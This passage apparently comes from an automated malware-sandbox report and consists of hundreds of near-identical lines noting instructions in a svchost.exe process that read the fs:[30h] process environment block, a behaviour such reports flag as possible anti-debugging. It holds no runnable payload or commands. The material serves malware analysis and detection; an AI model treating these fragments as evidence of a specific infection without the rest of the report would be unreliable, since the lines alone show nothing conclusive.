Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h] 1_2_0395B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E138A mov eax, dword ptr fs:[00000030h] 1_2_039E138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h] 1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h] 1_2_039DD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h] 1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h] 1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h] 1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h] 1_2_039F5BA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h] 1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h] 1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h] 1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0394DBE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E131B mov eax, dword ptr fs:[00000030h] 1_2_039E131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h] 1_2_039F8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h] 1_2_0392F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h] 1_2_0392DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h] 1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h] 1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h] 1_2_0392DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h] 1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h] 1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0395FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h] 1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h] 1_2_03952ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h] 1_2_03952AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h] 1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h] 1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h] 1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h] 1_2_03943A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h] 1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h] 1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h] 1_2_03938A0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h] 1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h] 1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h] 1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h] 1_2_039EEA55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h] 1_2_039B4257
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h] 1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h] 1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h] 1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h] 1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396927A mov eax, dword ptr fs:[00000030h] 1_2_0396927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h] 1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h] 1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h] 1_2_039F8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952990 mov eax, dword ptr fs:[00000030h] 1_2_03952990
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h] 1_2_0395A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h] 1_2_0394C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h] 1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h] 1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h] 1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h] 1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h] 1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h] 1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h] 1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h] 1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h] 1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h] 1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h] 1_2_039A69A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h] 1_2_039B41E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h] 1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h] 1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h] 1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h] 1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h] 1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h] 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h] 1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h] 1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h] 1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h] 1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h] 1_2_0392C962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929080 mov eax, dword ptr fs:[00000030h] 1_2_03929080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h] 1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h] 1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h] 1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h] 1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h] 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039690AF mov eax, dword ptr fs:[00000030h] 1_2_039690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h] 1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h] 1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h] 1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039258EC mov eax, dword ptr fs:[00000030h] 1_2_039258EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h] 1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h] 1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h] 1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h] 1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h] 1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h] 1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h] 1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h] 1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h] 1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h] 1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h] 1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h] 1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h] 1_2_039F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h] 1_2_039E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938794 mov eax, dword ptr fs:[00000030h] 1_2_03938794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h] 1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h] 1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h] 1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h] 1_2_039637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h] 1_2_0394F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h] 1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h] 1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h] 1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h] 1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h] 1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h] 1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h] 1_2_0395E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h] 1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h] 1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h] 1_2_0393EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h] 1_2_0393FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h] 1_2_039F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h] 1_2_039BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h] 1_2_039A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h] 1_2_039F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h] 1_2_03968EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039536CC mov eax, dword ptr fs:[00000030h] 1_2_039536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h] 1_2_039DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h] 1_2_039376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h] 1_2_039516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h] 1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h] 1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h] 1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h] 1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h] 1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h] 1_2_03958E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h] 1_2_039E1608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h] 1_2_039DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h] 1_2_0392E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h] 1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h] 1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h] 1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h] 1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393766D mov eax, dword ptr fs:[00000030h] 1_2_0393766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h] 1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h] 1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h] 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h] 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h] 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h] 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h] 1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h] 1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h] 1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h] 1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h] 1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h] 1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h] 1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h] 1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h] 1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h] 1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h] 1_2_039535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h] 1_2_039D8DF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h] 1_2_0392AD30
